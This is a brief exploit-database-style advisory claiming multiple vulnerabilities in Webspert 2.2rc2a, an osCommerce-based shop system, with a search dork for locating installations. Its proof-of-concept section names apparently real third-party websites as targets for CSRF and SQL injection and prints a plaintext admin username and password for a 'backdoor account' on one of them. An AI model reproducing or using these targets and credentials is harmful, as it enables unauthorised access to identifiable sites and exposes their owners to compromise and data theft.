========================================================================
| # Title : Webspert 2.2rc2a osCommerce Multi vulnerability
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Tested on : windows 8.1 Français V.(Pro)
| # Version : 2.2rc2a
| # Vendor : http://www.webspert.com.my/
| # Dork : "Powered by Webspert"
========================================================================
poc :
Webspert based on osCommerce version 2.2rc2a (2007) &
osCommerce version 2.2rc2a suffers from a cross site request forgery vulnerability. =https://packetstormsecurity.com/files/92311/osCommerce-2.2rc2a-Cross-Site-Request-Forgery.html
so
1 - Csrf :
http://www.kamazingart.com/private/backup.php/login.php
2 - backdoor Acounte :
http://www.kamazingart.com/private/
user : admin
Pass : conny123@
Sql injection :
http://www.sarayazahret.com/page.php?pageid=33
Greetz : ===============================================================
|
jericho * Larry W. Cashdollar * moncet-1 * Gjoko Krstic |
|
========================================================================